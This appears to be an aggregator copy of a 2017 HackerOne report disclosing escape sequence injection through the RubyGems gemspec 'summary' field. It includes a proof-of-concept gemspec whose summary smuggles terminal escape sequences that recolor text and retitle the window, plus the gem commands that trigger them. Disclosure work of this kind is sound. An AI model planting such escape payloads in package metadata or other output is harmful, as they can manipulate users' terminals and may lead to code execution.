Lucene search

MameH1:226335

HistoryMay 05, 2017 - 1:35 p.m.

RubyGems: Escape sequence injection in "summary" field

2017-05-0513:35:48

mame

hackerone.com

$500

0.02 Low

EPSS

Percentile

89.0%

JSON

Seems we can include any escape sequence in the “summary” field of gemspec. This allows attackers to inject escape sequences to a victim’s terminal emulator.

How to attack

An attacker creates a gem with summary string that includes malicious escape sequences, and push it to rubygems.org.
A victim executes gem search attackers-gem -d, and the malicious string is printed in the terminal emulator.

In general, this is considered vulnerable. I’d like you to read Terminal Emulator Security Issues in detail. In short, an attacker can exploit this, not only to surprise a victim with a rainbow string, but also to inject malicious command to a victim’s terminal, which may lead to abitrary code execution. Ruby WEBrick also handled a similar issue as a vulnerability.

Proof of concept

Prepare the following gemspec.

Gem::Specification.new do |spec|
  spec.name     = "escape-sequence-injection-vulnerability"
  spec.version  = "0.0.1"
  spec.authors  = ["Yusuke Endoh"]
  spec.email    = ["[email protected]"]
  spec.summary  = "foo\e[31mbar\e[0mbaz \e]2;BOOM!\a"
  spec.homepage = "http://example.com/"
  spec.license  = "MIT"
end

Run the following commands

gem build escape-sequence-injection-vulnerability.gemspec
gem install escape-sequence-injection-vulnerability-0.0.1.gem

Run the following command.

gem query escape-sequence-injection-vulnerability -d && sleep 10

You will see a summary line “foobarbaz” (with “bar” red), and its window title changed “BOOM!”.